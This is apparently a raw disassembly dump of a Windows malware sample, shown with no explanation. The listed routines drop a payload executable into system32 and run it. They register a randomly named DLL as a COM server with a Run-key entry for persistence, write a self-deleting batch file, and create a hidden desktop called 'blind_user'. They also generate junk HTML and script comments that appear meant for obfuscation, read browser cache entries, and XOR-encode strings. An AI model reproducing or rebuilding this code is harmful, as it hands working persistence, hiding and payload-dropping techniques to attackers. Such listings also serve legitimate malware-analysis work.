[ebp+var_1003] push eax call sub_4079D8 ; GetVolumeInformationA push [ebp+var_1008] push offset a08x ; "%08X" push edi call sub_407E40 add esp, 0Ch and [ebp+var_4], 0 loc_402762: ; CODE XREF: sub_4026EE+91j mov eax, [ebp+var_4] mov al, [edi+eax] cmp al, 41h jge short loc_402778 cmp al, 30h jle short loc_402778 mov eax, [ebp+var_4] add eax, edi add byte ptr [eax], 11h loc_402778: ; CODE XREF: sub_4026EE+7Cj ; sub_4026EE+80j inc [ebp+var_4] cmp [ebp+var_4], 8 jb short loc_402762 pop edi leave retn sub_4026EE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402784 proc near ; CODE XREF: sub_406344+437p var_26C = byte ptr -26Ch var_267 = byte ptr -267h var_163 = byte ptr -163h var_FF = byte ptr -0FFh push ebp mov ebp, esp sub esp, 26Ch push edi lea eax, [ebp+var_163] push eax call sub_4026EE lea eax, [ebp+var_163] push eax push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS_exe ; "%s\\%s.exe" lea eax, [ebp+var_FF] push eax call sub_407E40 lea eax, [ebp+var_FF] push eax call sub_4024E0 push 0 push 0 push 2 push 0 push 0 push 40000000h lea eax, [ebp+var_FF] push eax call sub_407A8C ; CreateFileA mov edi, eax push 0 lea eax, [ebp+var_26C] push eax push 3621h push offset byte_41C9E1 push edi call sub_407B40 ; WriteFile push edi call sub_407984 ; CloseHandle push 104h lea eax, [ebp+var_267] push eax push 0 call sub_40796C ; GetModuleFileNameA push offset asc_424E5F ; " " lea eax, [ebp+var_FF] push eax call sub_407E64 lea eax, [ebp+var_267] push eax lea eax, [ebp+var_FF] push eax call sub_407E64 add esp, 28h push 0 lea eax, [ebp+var_FF] push eax call sub_407B34 ; WinExec pop edi leave retn sub_402784 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40284A proc near ; CODE XREF: sub_406344+1B1p var_2F0 = dword ptr -2F0h var_2EC = dword ptr -2ECh var_2E8 = dword ptr -2E8h var_2E4 = dword ptr -2E4h var_2E0 = dword ptr -2E0h var_2DC = dword ptr -2DCh var_2D8 = dword ptr -2D8h var_2D4 = byte ptr -2D4h var_2CD = byte ptr -2CDh var_269 = byte ptr -269h var_205 = byte ptr -205h var_101 = byte ptr -101h var_FB = byte ptr -0FBh var_FA = byte ptr -0FAh var_F9 = byte ptr -0F9h var_1 = byte ptr -1 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 2F0h push ebx push esi push edi call sub_407E28 mov [ebp+var_2D8], eax call sub_407E28 mov [ebp+var_2DC], eax call sub_407E28 mov [ebp+var_2E0], eax call sub_407E28 mov [ebp+var_2E4], eax call sub_407E28 mov [ebp+var_2E8], eax call sub_407E28 mov [ebp+var_2EC], eax call sub_407E28 mov [ebp+var_2F0], eax call sub_407E28 mov ecx, 0FFFFh cdq idiv ecx push edx mov edi, [ebp+var_2F0] mov eax, edi mov ecx, 0FFFFh cdq idiv ecx push edx mov edi, [ebp+var_2EC] mov eax, edi mov ecx, 0FFFFh cdq idiv ecx push edx mov edi, [ebp+var_2E8] mov eax, edi mov ecx, 0FFFFh cdq idiv ecx push edx mov edi, [ebp+var_2E4] mov eax, edi mov ecx, 0FFFFh cdq idiv ecx push edx mov edi, [ebp+var_2E0] mov eax, edi mov ecx, 0FFFFh cdq idiv ecx push edx mov edi, [ebp+var_2DC] mov eax, edi mov ecx, 0FFFFh cdq idiv ecx push edx mov edi, [ebp+var_2D8] mov eax, edi mov ecx, 0FFFFh cdq idiv ecx push edx push offset a04x04x04x04x04 ; "{%04X%04X-%04X-%04X-%04X-%04X%04X%04X}" lea edi, [ebp+var_269] push edi call sub_407E40 lea eax, [ebp+var_2CD] push eax call sub_4026EE add esp, 2Ch call sub_407E28 mov edx, 10624DD3h mov ecx, eax imul edx sar edx, 7 sar ecx, 1Fh sub edx, ecx mov edi, edx add edi, 41h mov ebx, edi mov [ebp+var_101], bl mov [ebp+var_1], 1 jmp short loc_40299B ; --------------------------------------------------------------------------- loc_402971: ; CODE XREF: sub_40284A+156j call sub_407E28 movzx edi, [ebp+var_1] mov edx, 10624DD3h mov ecx, eax imul edx sar edx, 7 sar ecx, 1Fh sub edx, ecx mov ebx, edx add ebx, 61h mov [ebp+edi+var_101], bl add [ebp+var_1], 1 loc_40299B: ; CODE XREF: sub_40284A+125j mov al, [ebp+var_1] cmp al, 8 jbe short loc_402971 mov [ebp+var_F9], 0 call sub_407E28 mov edx, eax test dl, 1 jnz short loc_4029C3 mov [ebp+var_FB], 33h mov [ebp+var_FA], 32h loc_4029C3: ; CODE XREF: sub_40284A+169j lea eax, [ebp+var_101] push eax push offset aCWindowsSystem ; "C:\\WINDOWS\\system32" push offset aSS_dll ; "%s\\%s.dll" lea eax, [ebp+var_205] push eax call sub_407E40 lea eax, [ebp+var_205] push eax call sub_4024E0 push 0 push 0 push 2 push 0 push 0 push 40000000h lea eax, [ebp+var_205] push eax call sub_407A8C ; CreateFileA mov esi, eax push [ebp+arg_0] mov eax, offset aDnpbikeo ; "Dnpbikeo" push eax call sub_407E40 push 0 lea eax, [ebp+var_2D4] push eax push 1A01h push offset dword_41AFE0 push esi call sub_407B40 ; WriteFile push esi call sub_407984 ; CloseHandle lea eax, [ebp+var_269] push eax push offset aClsidSInprocse ; "CLSID\\%s\\InProcServer32" lea eax, [ebp+var_101] push eax call sub_407E40 lea eax, [ebp+var_205] push eax push offset byte_424E15 lea eax, [ebp+var_101] push eax push 80000000h call sub_402AAB push offset aApartment ; "Apartment" push offset aThreadingmodel ; "ThreadingModel" lea eax, [ebp+var_101] push eax push 80000000h call sub_402AAB lea eax, [ebp+var_269] push eax lea eax, [ebp+var_2CD] push eax push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"... push 80000002h call sub_402AAB add esp, 58h pop edi pop esi pop ebx leave retn sub_40284A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402AAB proc near ; CODE XREF: sub_40284A+21Cp ; sub_40284A+237p ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ecx push eax push esi push edi mov edi, [ebp+arg_C] inc dword_41A1FC and [ebp+var_4], 0 lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax push 0 push 0F003Fh push 0 push 0 push 0 push [ebp+arg_4] push [ebp+arg_0] call sub_407D2C ; RegCreateKeyExA mov ecx, edi or eax, 0FFFFFFFFh loc_402AE4: ; CODE XREF: sub_402AAB+3Ej inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_402AE4 mov [ebp+var_8], eax push [ebp+var_8] push edi push 1 push 0 push [ebp+arg_8] push [ebp+var_4] call sub_407D5C ; RegSetValueExA push [ebp+var_4] call sub_407D38 ; RegCloseKey pop edi pop esi leave retn sub_402AAB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402B0D proc near ; CODE XREF: sub_406344+1EAp var_1494 = byte ptr -1494h var_148F = byte ptr -148Fh var_1390 = dword ptr -1390h var_1380 = dword ptr -1380h var_12FC = byte ptr -12FCh var_11FD = byte ptr -11FDh var_10FE = byte ptr -10FEh var_FF = byte ptr -0FFh push ebp mov ebp, esp mov eax, 1494h call sub_4078CC push ebx push esi push edi push 0FFh lea eax, [ebp+var_12FC] push eax push 0 call sub_40796C ; GetModuleFileNameA mov [ebp+var_1390], 94h lea eax, [ebp+var_1390] push eax call sub_4079CC ; GetVersionExA cmp [ebp+var_1380], 2 jnz short loc_402BA6 push 0FFh lea eax, [ebp+var_FF] push eax call sub_40799C ; GetSystemDirectoryA lea eax, [ebp+var_FF] push eax push offset aSXslfdlnt_bat ; "%s\\xslfdlnt.bat" lea eax, [ebp+var_11FD] push eax call sub_407E40 lea eax, [ebp+var_FF] push eax push offset aSCmd_pif ; "%s\\cmd.pif" lea eax, [ebp+var_148F] push eax call sub_407E40 push offset aCmd_exe ; "\\cmd.exe" lea eax, [ebp+var_FF] push eax call sub_407E64 add esp, 20h jmp short loc_402BFB ; --------------------------------------------------------------------------- loc_402BA6: ; CODE XREF: sub_402B0D+40j push 0FFh lea eax, [ebp+var_FF] push eax call sub_4079E4 ; GetWindowsDirectoryA lea eax, [ebp+var_FF] push eax push offset aSXslfdl9x_bat ; "%s\\xslfdl9x.bat" lea eax, [ebp+var_11FD] push eax call sub_407E40 lea eax, [ebp+var_FF] push eax push offset aSCommand_pif ; "%s\\command.pif" lea eax, [ebp+var_148F] push eax call sub_407E40 push offset aCommand_com ; "\\command.com" lea eax, [ebp+var_FF] push eax call sub_407E64 add esp, 20h loc_402BFB: ; CODE XREF: sub_402B0D+97j lea eax, [ebp+var_148F] push eax call sub_407B70 ; DeleteFileA push 0 push 80h push 2 push 0 push 0 push 40000000h lea eax, [ebp+var_11FD] push eax call sub_407A8C ; CreateFileA mov edi, eax lea eax, [ebp+var_11FD] push eax lea eax, [ebp+var_12FC] push eax lea eax, [ebp+var_12FC] push eax push offset aLoop@delSNul@i ; ":loop\r\n@del %s>nul\r\n@if exist %s goto l"... lea eax, [ebp+var_10FE] push eax call sub_407E40 add esp, 14h lea ecx, [ebp+var_10FE] or eax, 0FFFFFFFFh loc_402C59: ; CODE XREF: sub_402B0D+151j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_402C59 push 0 lea ebx, [ebp+var_1494] push ebx push eax lea esi, [ebp+var_10FE] push esi push edi call sub_407B40 ; WriteFile push edi call sub_407984 ; CloseHandle lea eax, [ebp+var_11FD] push eax lea eax, [ebp+var_FF] push eax push offset aSCS ; "%s /C %s" lea eax, [ebp+var_10FE] push eax call sub_407E40 add esp, 10h push 0 lea eax, [ebp+var_10FE] push eax call sub_407B34 ; WinExec pop edi pop esi pop ebx leave retn sub_402B0D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402CB2 proc near ; CODE XREF: sub_403D8E+124p var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push esi push edi cmp dword_420004, 0 jz short loc_402CDE call sub_407948 ; GetCurrentThreadId push eax call sub_407C48 ; GetThreadDesktop mov [ebp+var_4], eax mov eax, dword_420004 cmp [ebp+var_4], eax jnz short loc_402D02 xor eax, eax inc eax jmp short loc_402D0F ; --------------------------------------------------------------------------- loc_402CDE: ; CODE XREF: sub_402CB2+Dj push 0 push 0C7h push 0 push 0 push 0 push offset aBlind_user ; "blind_user" call sub_407C30 ; CreateDesktopA mov dword_420004, eax or eax, eax jnz short loc_402D02 xor eax, eax jmp short loc_402D0F ; --------------------------------------------------------------------------- loc_402D02: ; CODE XREF: sub_402CB2+25j ; sub_402CB2+4Aj push dword_420004 call sub_407C3C ; SetThreadDesktop mov edi, eax loc_402D0F: ; CODE XREF: sub_402CB2+2Aj ; sub_402CB2+4Ej pop edi pop esi leave retn sub_402CB2 endp ; =============== S U B R O U T I N E ======================================= sub_402D13 proc near ; CODE XREF: sub_403D8E+17Fp arg_0 = dword ptr 4 mov eax, [esp+arg_0] lea edx, aBlind_user ; "blind_user" mov [eax+8], edx retn sub_402D13 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402D21 proc near ; CODE XREF: sub_403659+3FDp ; sub_403659+462p ... var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_104 = dword ptr -104h var_100 = byte ptr -100h var_FF = byte ptr -0FFh arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 10Ch push esi push edi mov esi, [ebp+arg_0] push [ebp+arg_4] push esi call sub_407E64 add esp, 8 call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge loc_402DDB mov [ebp+var_FF], 0 push offset asc_424D14 ; "/* " push esi call sub_407E64 add esp, 8 mov [ebp+var_100], 0 jmp short loc_402DB6 ; --------------------------------------------------------------------------- loc_402D6F: ; CODE XREF: sub_402D21+9Dj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_402DAF call sub_407E28 mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi lea edi, [ebp+var_FF] push edi push offset aSC ; "%s%c" lea edi, [ebp+var_FF] push edi call sub_407E40 add esp, 10h loc_402DAF: ; CODE XREF: sub_402D21+5Ej add [ebp+var_100], 1 loc_402DB6: ; CODE XREF: sub_402D21+4Cj mov al, [ebp+var_100] cmp al, 0Ah jb short loc_402D6F lea eax, [ebp+var_FF] push eax push esi call sub_407E64 push offset asc_424D0B ; " */" push esi call sub_407E64 add esp, 10h loc_402DDB: ; CODE XREF: sub_402D21+2Aj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge loc_402E83 call sub_407E28 mov [ebp+var_104], eax call sub_407E28 mov [ebp+var_108], eax call sub_407E28 mov [ebp+var_10C], eax call sub_407E28 mov ecx, 0EA60h cdq idiv ecx push edx mov edi, [ebp+var_10C] mov eax, edi mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi mov edi, [ebp+var_108] mov eax, edi mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi mov edi, [ebp+var_104] mov eax, edi mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi push offset aVarCCCU ; "var %c%c%c = %u;" lea edi, [ebp+var_FF] push edi call sub_407E40 lea eax, [ebp+var_FF] push eax push esi call sub_407E64 add esp, 20h loc_402E83: ; CODE XREF: sub_402D21+CAj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_402F0B call sub_407E28 mov [ebp+var_104], eax call sub_407E28 mov [ebp+var_108], eax call sub_407E28 mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi mov edi, [ebp+var_108] mov eax, edi mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi mov edi, [ebp+var_104] mov eax, edi mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi push offset aCCC ; "//%c%c%c\r\n" lea edi, [ebp+var_FF] push edi call sub_407E40 lea eax, [ebp+var_FF] push eax push esi call sub_407E64 add esp, 1Ch loc_402F0B: ; CODE XREF: sub_402D21+172j call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_402F2B push offset asc_424CEC ; "\r\n" push esi call sub_407E64 add esp, 8 loc_402F2B: ; CODE XREF: sub_402D21+1FAj pop edi pop esi leave retn sub_402D21 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402F2F proc near ; CODE XREF: sub_403659+ECp ; sub_403659+FAp ... var_100 = byte ptr -100h var_FF = byte ptr -0FFh arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 100h push esi push edi mov esi, [ebp+arg_0] push [ebp+arg_4] push esi call sub_407E64 add esp, 8 call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge loc_403070 mov [ebp+var_FF], 0 push offset asc_424CE6 ; "<!-- " push esi call sub_407E64 add esp, 8 mov [ebp+var_100], 0 jmp loc_403047 sub_402F2F endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_403010 loc_402F80: ; CODE XREF: sub_403010+3Fj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_402FC0 call sub_407E28 mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi lea edi, [ebp-0FFh] push edi push offset aSC ; "%s%c" lea edi, [ebp-0FFh] push edi call sub_407E40 add esp, 10h loc_402FC0: ; CODE XREF: sub_403010-80j call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_403000 call sub_407E28 mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 41h push edi lea edi, [ebp-0FFh] push edi push offset aSC ; "%s%c" lea edi, [ebp-0FFh] push edi call sub_407E40 add esp, 10h loc_403000: ; CODE XREF: sub_403010-40j ; DATA XREF: .data:loc_41E216r ... call sub_407E28 mov ecx, 0Ah ; DATA XREF: .data:0041D2CCr ; .data:0041D39Aw ... cdq idiv ecx cmp edx, 7 ; END OF FUNCTION CHUNK FOR sub_403010 ; =============== S U B R O U T I N E ======================================= sub_403010 proc near ; DATA XREF: .data:0041D36Do ; sub_41E239+10o ; FUNCTION CHUNK AT 00402F80 SIZE 00000090 BYTES jge short loc_403040 call sub_407E28 mov ecx, 9 cdq idiv ecx mov edi, edx add edi, 30h push edi lea edi, [ebp-0FFh] push edi push offset aSC ; "%s%c" lea edi, [ebp-0FFh] push edi call sub_407E40 add esp, 10h loc_403040: ; CODE XREF: sub_403010j add byte ptr [ebp-100h], 1 loc_403047: ; CODE XREF: sub_402F2F+4Cj mov al, [ebp-100h] cmp al, 0Ah jb loc_402F80 lea eax, [ebp-0FFh] push eax push esi call sub_407E64 push offset asc_424CE1 ; "--> " push esi call sub_407E64 add esp, 10h loc_403070: ; CODE XREF: sub_402F2F+2Aj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge loc_40317E mov byte ptr [ebp-0FFh], 0 mov byte ptr [ebp-100h], 0 jmp loc_403160 ; --------------------------------------------------------------------------- loc_403099: ; CODE XREF: sub_403010+158j call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 4 jge short loc_4030D9 call sub_407E28 mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 61h push edi lea edi, [ebp-0FFh] push edi push offset aSC ; "%s%c" lea edi, [ebp-0FFh] push edi call sub_407E40 add esp, 10h loc_4030D9: ; CODE XREF: sub_403010+99j call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 4 jge short loc_403119 call sub_407E28 mov ecx, 1Ah cdq idiv ecx mov edi, edx add edi, 41h push edi lea edi, [ebp-0FFh] push edi push offset aSC ; "%s%c" lea edi, [ebp-0FFh] push edi call sub_407E40 add esp, 10h loc_403119: ; CODE XREF: sub_403010+D9j call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 3 jge short loc_403159 call sub_407E28 mov ecx, 9 cdq idiv ecx mov edi, edx add edi, 30h push edi lea edi, [ebp-0FFh] push edi push offset aSC ; "%s%c" lea edi, [ebp-0FFh] push edi call sub_407E40 add esp, 10h loc_403159: ; CODE XREF: sub_403010+119j add byte ptr [ebp-100h], 1 loc_403160: ; CODE XREF: sub_403010+84j mov al, [ebp-100h] cmp al, 32h jb loc_403099 lea eax, [ebp-0FFh] push eax push esi call sub_407E64 add esp, 8 loc_40317E: ; CODE XREF: sub_403010+70j call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_40319E push offset aBr ; "<br>" push esi call sub_407E64 add esp, 8 loc_40319E: ; CODE XREF: sub_403010+17Ej call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_4031BE push offset aB_1 ; "<b>" push esi call sub_407E64 add esp, 8 loc_4031BE: ; CODE XREF: sub_403010+19Ej call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_4031DE push offset aU_0 ; "<u>" push esi call sub_407E64 add esp, 8 loc_4031DE: ; CODE XREF: sub_403010+1BEj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_4031FE push offset aI_0 ; "<i>" push esi call sub_407E64 add esp, 8 loc_4031FE: ; CODE XREF: sub_403010+1DEj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_40321E push offset aI ; "</i>" push esi call sub_407E64 add esp, 8 loc_40321E: ; CODE XREF: sub_403010+1FEj call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_40323E push offset aB ; "</b>" push esi call sub_407E64 add esp, 8 loc_40323E: ; CODE XREF: sub_403010+21Ej call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_40325E push offset aU ; "</u>" push esi call sub_407E64 add esp, 8 loc_40325E: ; CODE XREF: sub_403010+23Ej call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_40327E push offset aFont ; "</font>" push esi call sub_407E64 add esp, 8 loc_40327E: ; CODE XREF: sub_403010+25Ej call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_40329E push offset aCenter ; "<center>" push esi call sub_407E64 add esp, 8 loc_40329E: ; CODE XREF: sub_403010+27Ej call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_4032BE push offset aCenter_0 ; "</center>" push esi call sub_407E64 add esp, 8 loc_4032BE: ; CODE XREF: sub_403010+29Ej call sub_407E28 mov ecx, 0Ah cdq idiv ecx cmp edx, 5 jge short loc_4032DE push offset asc_424CEC ; "\r\n" push esi call sub_407E64 add esp, 8 loc_4032DE: ; CODE XREF: sub_403010+2BEj pop edi pop esi leave retn sub_403010 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4032E2 proc near ; CODE XREF: sub_4033E8+58p var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0Ch push ebx push esi push edi xor edi, edi inc edi push [ebp+arg_0] call sub_407D8C ; GetSidIdentifierAuthority mov esi, eax push [ebp+arg_0] call sub_407DA4 ; GetSidSubAuthorityCount movzx edx, byte ptr [eax] mov [ebp+var_8], edx mov eax, 0Ch mul [ebp+var_8] mov [ebp+var_C], eax add eax, 1Ch mov [ebp+var_4], eax push edi push offset aSLu ; "S-%lu-" push [ebp+arg_4] call sub_407C78 ; wsprintfA add esp, 0Ch mov [ebp+var_4], eax mov ebx, eax add ebx, [ebp+arg_4] cmp byte ptr [esi], 0 jnz short loc_40333B cmp byte ptr [esi+1], 0 jz short loc_403382 loc_40333B: ; CODE XREF: sub_4032E2+51j movzx eax, byte ptr [esi+5] movzx eax, ax push eax movzx eax, byte ptr [esi+4] movzx eax, ax push eax movzx eax, byte ptr [esi+3] movzx eax, ax push eax movzx eax, byte ptr [esi+2] movzx eax, ax push eax movzx eax, byte ptr [esi+1] movzx eax, ax push eax movzx eax, byte ptr [esi] movzx eax, ax push eax push offset a0x02hx02hx02hx ; "0x%02hx%02hx%02hx%02hx%02hx%02hx" push ebx call sub_407C78 ; wsprintfA add esp, 20h mov edi, eax add [ebp+var_4], edi lea ebx, [ebx+edi] jmp short loc_4033B8 ; --------------------------------------------------------------------------- loc_403382: ; CODE XREF: sub_4032E2+57j movzx edx, byte ptr [esi+5] movzx ecx, byte ptr [esi+4] shl ecx, 8 add edx, ecx movzx ecx, byte ptr [esi+3] shl ecx, 10h add edx, ecx movzx ecx, byte ptr [esi+2] shl ecx, 18h add edx, ecx push edx push offset aLu_0 ; "%lu" push ebx call sub_407C78 ; wsprintfA add esp, 0Ch mov edi, eax add [ebp+var_4], edi lea ebx, [ebx+edi] loc_4033B8: ; CODE XREF: sub_4032E2+9Ej xor esi, esi jmp short loc_4033DE ; --------------------------------------------------------------------------- loc_4033BC: ; CODE XREF: sub_4032E2+FFj push esi push [ebp+arg_0] call sub_407D98 ; GetSidSubAuthority push dword ptr [eax] push offset aLu ; "-%lu" push ebx call sub_407C78 ; wsprintfA add esp, 0Ch mov edi, eax add [ebp+var_4], edi lea ebx, [ebx+edi] inc esi loc_4033DE: ; CODE XREF: sub_4032E2+D8j cmp esi, [ebp+var_8] jb short loc_4033BC pop edi pop esi pop ebx leave retn sub_4032E2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4033E8 proc near ; CODE XREF: sub_403BC5+123p var_8 = byte ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push eax push edi call sub_40793C ; GetCurrentProcessId mov edi, eax push edi push 0 push 1F0FFFh call sub_407A80 ; OpenProcess mov edi, eax lea eax, [ebp+var_4] push eax push 0F00FFh push edi call sub_407D14 ; OpenProcessToken push edi call sub_407984 ; CloseHandle push 4000h push 40h call sub_407A5C ; LocalAlloc mov edi, eax lea eax, [ebp+var_8] push eax push 4000h push edi push 1 push [ebp+var_4] call sub_407D20 ; GetTokenInformation push [ebp+arg_0] push dword ptr [edi] call sub_4032E2 add esp, 8 push edi call sub_407A68 ; LocalFree push [ebp+var_4] call sub_407984 ; CloseHandle pop edi leave retn sub_4033E8 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_403459 proc near ; CODE XREF: sub_403D8E+2F4p ; sub_40409C+3p var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push edi push 0 push 80h push 4 push 0 push 0 push 0C0000000h push [ebp+arg_0] call sub_407A8C ; CreateFileA mov edi, eax cmp edi, 0FFFFFFFFh jnz short loc_403483 xor eax, eax jmp short loc_4034AA ; --------------------------------------------------------------------------- loc_403483: ; CODE XREF: sub_403459+24j push 2 push 0 push 0 push edi call sub_407ABC ; SetFilePointer push 0 lea eax, [ebp+var_4] push eax push [ebp+arg_8] push [ebp+arg_4] push edi call sub_407B40 ; WriteFile push edi call sub_407984 ; CloseHandle xor eax, eax inc eax loc_4034AA: ; CODE XREF: sub_403459+28j pop edi leave retn sub_403459 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4034AD proc near ; CODE XREF: sub_403D8E+274p var_2F46 = word ptr -2F46h var_2F43 = byte ptr -2F43h var_1F44 = dword ptr -1F44h var_1F40 = byte ptr -1F40h var_1F3C = dword ptr -1F3Ch var_1F38 = dword ptr -1F38h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp mov eax, 2F48h call sub_4078CC push ebx push esi push edi mov esi, [ebp+arg_4] push [ebp+arg_0] lea eax, [ebp+var_2F43] push eax call sub_4078EC push 1 push offset a? ; "?" lea eax, [ebp+var_2F43] push eax call sub_401429 add esp, 0Ch mov ebx, eax mov [ebp+var_2F46], bx movzx eax, [ebp+var_2F46] cmp eax, 0FFFFh jz short loc_40350B movzx eax, [ebp+var_2F46] mov [ebp+eax+var_2F43], 0 loc_40350B: ; CODE XREF: sub_4034AD+4Dj mov [ebp+var_1F44], 1F40h lea eax, [ebp+var_1F44] push eax lea eax, [ebp+var_1F40] push eax push offset a_ ; "*.*" call sub_406E4C ; FindFirstUrlCacheEntryA mov edi, eax or eax, eax jz short loc_4035AD lea eax, [ebp+var_2F43] push eax push [ebp+var_1F3C] call sub_407DD4 add esp, 8 or eax, eax jnz short loc_40355D push [ebp+var_1F38] push esi call sub_4078EC xor eax, eax inc eax jmp short loc_4035AD ; --------------------------------------------------------------------------- loc_40355D: ; CODE XREF: sub_4034AD+9Dj ; sub_4034AD:loc_4035A9j mov [ebp+var_1F44], 1F40h lea eax, [ebp+var_1F44] push eax lea eax, [ebp+var_1F40] push eax push edi call sub_406E58 ; FindNextUrlCacheEntryA or eax, eax jz short loc_4035AB lea eax, [ebp+var_2F43] push eax push [ebp+var_1F3C] call sub_407DD4 add esp, 8 or eax, eax jnz short loc_4035A9 push [ebp+var_1F38] push esi call sub_4078EC xor eax, eax inc eax jmp short loc_4035AD ; --------------------------------------------------------------------------- loc_4035A9: ; CODE XREF: sub_4034AD+E9j jmp short loc_40355D ; --------------------------------------------------------------------------- loc_4035AB: ; CODE XREF: sub_4034AD+D0j xor eax, eax loc_4035AD: ; CODE XREF: sub_4034AD+84j ; sub_4034AD+AEj ... pop edi pop esi pop ebx leave retn sub_4034AD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4035B2 proc near ; CODE XREF: sub_403659+36Bp var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_2 = word ptr -2 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi mov ebx, [ebp+arg_0] push ebx call sub_407B4C ; lstrlenA mov [ebp+var_8], eax mov edi, eax shl edi, 1 add edi, 8 push edi push 40h call sub_407A5C ; LocalAlloc mov [ebp+var_C], eax xor esi, esi jmp short loc_4035F3 ; --------------------------------------------------------------------------- loc_4035DD: ; CODE XREF: sub_4035B2+44j movzx eax, byte ptr [ebx+esi] xor eax, 71h or eax, eax jz short loc_4035F2 movzx eax, byte ptr [ebx+esi] xor eax, 71h mov [ebx+esi], al loc_4035F2: ; CODE XREF: sub_4035B2+34j inc esi loc_4035F3: ; CODE XREF: sub_4035B2+29j cmp esi, [ebp+var_8] jb short loc_4035DD mov [ebp+var_2], 0 jmp short loc_403648 ; --------------------------------------------------------------------------- loc_403600: ; CODE XREF: sub_4035B2+9Dj movzx edi, [ebp+var_2] movzx edi, byte ptr [ebx+edi] mov eax, edi mov ecx, 1Ah cdq idiv ecx mov esi, edx add esi, 61h push esi mov eax, edi mov ecx, 1Ah mov edx, 4EC4EC4Fh mul edx shr edx, 3 mov [ebp+var_10], edx mov edi, edx add edi, 61h push edi mov edi, [ebp+var_C] push edi push offset aSCC ; "%s%c%c" push edi call sub_407E40 add esp, 14h inc [ebp+var_2] loc_403648: ; CODE XREF: sub_4035B2+4Cj movzx eax, [ebp+var_2] cmp eax, [ebp+var_8] jb short loc_403600 mov eax, [ebp+var_C] pop edi pop esi pop ebx leave retn sub_4035B2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_403659 proc near ; CODE XREF: sub_403D8E+BEp var_30048 = dword ptr -30048h var_30044 = dword ptr -30044h var_30040 = dword ptr -30040h var_3003C = dword ptr -3003Ch var_30038 = dword ptr -30038h var_30034 = dword ptr -30034h var_3002C = byte ptr 